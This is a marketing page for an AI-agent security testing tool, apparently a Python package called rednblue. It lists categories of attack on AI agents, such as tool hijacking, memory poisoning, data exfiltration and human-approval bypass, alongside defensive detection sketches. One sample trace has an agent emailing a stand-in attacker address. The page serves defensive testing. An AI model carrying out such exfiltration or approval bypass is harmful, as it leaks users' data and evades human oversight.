Why AgentGuard?

An AI agent that executes code, sends emails, or queries databases amplifies the consequences of every vulnerability. A malicious instruction no longer produces just a bad response; it can trigger an irreversible action. AgentGuard tests your autonomous agents against known attack techniques that target tool-using systems.

Supported agent types

Customer Support Agents

Assistants with access to user accounts, CRM, and knowledge bases

Intercom · Zendesk · Custom agents

Development Agents

Agents capable of modifying code, executing commands, creating PRs

GitHub Copilot · Cursor · CI/CD agents

Research & Analysis Agents

Agents that browse the web, read documents, produce reports

Deep Research · Perplexity-style · Custom agents

Orchestration Agents

Agents coordinating multiple sub-agents or automated workflows

AutoGen · CrewAI · LangGraph · Multi-level agents

Commerce Agents

Agents with access to payments, orders, inventory management

E-commerce agents · Booking · Payment

Data & Analytics Agents

Agents with database access, SQL generation, query execution

Text-to-SQL · BI agents · Analytics agents

Communication Agents

Agents sending emails, messages, automated notifications

Email agents · Slack · Teams · Marketing automation

System Agents

DevOps, SRE, and cloud infrastructure management agents

Infra agents · K8s · AWS · Automation

Your agent not listed?

If your framework or agent type isn't listed, contact us. We develop test modules on demand.


Attack categories tested

Tool hijacking

Manipulating the agent to call tools unexpectedly or with malicious parameters.
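
One way to picture what a tool-hijacking check looks for: every tool call the agent emits is compared against a policy of expected tools and acceptable parameters. The sketch below is illustrative only. `ToolCall`, `POLICY`, `find_violations`, and the tool names are hypothetical and are not taken from AgentGuard's API.

```python
from dataclasses import dataclass, field
from typing import Any, Callable


@dataclass
class ToolCall:
    """One tool invocation recorded from an agent run (hypothetical shape)."""
    name: str
    args: dict[str, Any] = field(default_factory=dict)


# Hypothetical policy: tool name -> predicate that accepts or rejects the arguments.
POLICY: dict[str, Callable[[dict[str, Any]], bool]] = {
    "search_kb": lambda args: True,
    "send_email": lambda args: str(args.get("to", "")).endswith("@example.com"),
}


def find_violations(calls: list[ToolCall]) -> list[str]:
    """Return a human-readable reason for every call that breaks the policy."""
    violations = []
    for call in calls:
        check = POLICY.get(call.name)
        if check is None:
            # The agent called a tool that is not part of its expected toolset.
            violations.append(f"unexpected tool: {call.name}")
        elif not check(call.args):
            # The tool is expected, but the parameters fall outside the policy.
            violations.append(f"disallowed parameters for {call.name}: {call.args}")
    return violations


# Example trace: one legitimate call, one call with a malicious recipient,
# and one call to a tool the agent should never use.
trace = [
    ToolCall("search_kb", {"query": "refund policy"}),
    ToolCall("send_email", {"to": "attacker@evil.test", "body": "..."}),
    ToolCall("delete_account", {"user_id": 42}),
]
for reason in find_violations(trace):
    print(reason)
```

A policy expressed as predicates keeps the two failure modes separate: an unexpected tool versus an expected tool called with malicious parameters.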

Goal drift

Gradually diverting the agent from its original mission through intermediate instructions.

Privilege escalation

Attempts to make the agent access resources or tools beyond its authorized scope.

Infinite loops & exhaustion

Causing the agent to loop or consume its resources until exhaustion.
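
A minimal sketch of how looping or exhaustion might be detected in a recorded run, assuming the run is available as a list of `(tool_name, args)` steps. The function name and both thresholds are assumptions made for illustration; the default step budget of 20 simply echoes the `--max-steps 20` value used in the commands further down.

```python
import json
from collections import Counter


def detect_exhaustion(steps, max_steps=20, max_repeats=3):
    """Flag a run that exceeds its step budget or repeats an identical call.

    `steps` is a list of (tool_name, args_dict) tuples. Returns a reason
    string, or None when nothing suspicious is found.
    """
    if len(steps) > max_steps:
        return f"step budget exceeded: {len(steps)} > {max_steps}"
    # Serialize arguments with sorted keys so identical calls compare equal.
    seen = Counter((name, json.dumps(args, sort_keys=True)) for name, args in steps)
    for (name, _), count in seen.items():
        if count > max_repeats:
            return f"possible loop: {name} called {count} times with identical arguments"
    return None


# Example: the same page fetched five times in a row.
looping_run = [("fetch_page", {"url": "https://example.com"})] * 5
print(detect_exhaustion(looping_run))
```

Exact-match repetition is a deliberately simple signal. A loop that varies its arguments slightly on each step would only be caught by the step budget.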

Memory poisoning

Injecting malicious information into the agent's long-term memory.

Backdoor detection

Identifying abnormal behavior activated by hidden triggers in inputs.

Cross-agent contamination

Tests for multi-agent architectures: can a compromised agent infect the others?
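
To reason about how far a compromise could spread, it can help to model the multi-agent system as a directed graph of who sends output to whom. The sketch below computes which agents are exposed to a compromised agent's output, directly or transitively. It is an assumption-laden illustration: `reachable_agents` and the agent names are hypothetical, and exposure is only an upper bound on actual infection.

```python
from collections import deque


def reachable_agents(message_edges, compromised):
    """Return every agent that can receive output from `compromised`,
    directly or through intermediate agents (breadth-first search)."""
    graph = {}
    for sender, receiver in message_edges:
        graph.setdefault(sender, set()).add(receiver)

    exposed = set()
    queue = deque([compromised])
    while queue:
        current = queue.popleft()
        for receiver in graph.get(current, ()):
            # Skip agents already visited and the compromised agent itself.
            if receiver not in exposed and receiver != compromised:
                exposed.add(receiver)
                queue.append(receiver)
    return exposed


# Hypothetical pipeline: planner -> researcher -> writer -> reviewer.
edges = [("planner", "researcher"), ("researcher", "writer"), ("writer", "reviewer")]
print(sorted(reachable_agents(edges, "researcher")))
```

In this example the planner is upstream of the compromised researcher, so it is not in the exposed set.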

Data exfiltration

Attempts to make the agent transmit sensitive data via its tools (email, external API, logs).
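
A common way to observe exfiltration is to plant a canary string in the sensitive data and then look for it in the arguments of outbound tool calls. The following is a minimal sketch under that assumption; the canary value, the set of outbound tool names, and `leaked_calls` are all hypothetical.

```python
import json

CANARY = "CANARY-7f3a91"  # hypothetical marker planted in the test data

# Assumed names for tools that can move data out of the system.
OUTBOUND_TOOLS = {"send_email", "http_post", "write_log"}


def leaked_calls(tool_calls, canary=CANARY):
    """Return the names of outbound tool calls whose arguments contain the canary.

    `tool_calls` is a list of (tool_name, args_dict) tuples. Arguments are
    serialized to JSON so nested values are searched as well.
    """
    leaks = []
    for name, args in tool_calls:
        if name in OUTBOUND_TOOLS and canary in json.dumps(args):
            leaks.append(name)
    return leaks


calls = [
    ("read_db", {"query": "SELECT * FROM customers"}),
    ("send_email", {"to": "someone@example.com", "body": f"Record: {CANARY}"}),
    ("http_post", {"url": "https://example.com/hook", "data": {"status": "ok"}}),
]
print(leaked_calls(calls))
```

An exact string match will miss data the agent has encoded or paraphrased before sending, so a check like this is a starting point rather than a complete detector.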

Human approval bypass

Techniques to bypass human validation steps required for critical actions.
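
One way to check for an approval bypass is to replay the agent's event log and confirm that every critical action was preceded by a matching human approval. The sketch below assumes a simple ordered log of approval and action events. The event shape, the action names, and `unapproved_actions` are hypothetical.

```python
CRITICAL_ACTIONS = {"issue_refund", "delete_records"}  # assumed action names


def unapproved_actions(events):
    """Return critical actions that ran without a preceding matching approval.

    `events` is an ordered list of dicts such as
    {"type": "approval", "action": "issue_refund"} or
    {"type": "action", "action": "issue_refund"}.
    Each approval is consumed by exactly one action.
    """
    pending = {}  # action name -> number of unused approvals
    violations = []
    for event in events:
        name = event["action"]
        if event["type"] == "approval":
            pending[name] = pending.get(name, 0) + 1
        elif event["type"] == "action" and name in CRITICAL_ACTIONS:
            if pending.get(name, 0) > 0:
                pending[name] -= 1  # this action uses up one approval
            else:
                violations.append(name)
    return violations


events = [
    {"type": "approval", "action": "issue_refund"},
    {"type": "action", "action": "issue_refund"},    # approved
    {"type": "action", "action": "issue_refund"},    # approval already used
    {"type": "action", "action": "search_kb"},       # not critical
    {"type": "action", "action": "delete_records"},  # never approved
]
print(unapproved_actions(events))
```

Consuming one approval per action means a single approval cannot be reused to authorize repeated critical actions.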

Get started in a few commands

# Install
pip install rednblue

# Test an autonomous agent
rnb llm --file my_agent.py --attacks AGT

# Full suite (LLM + Agent + RAG)
rnb llm --file my_agent.py --all

# Autonomous mode (multi-tool agent)
rnb llm --file my_agent.py --mode autonomous --max-steps 20

Ready to test your AI agent?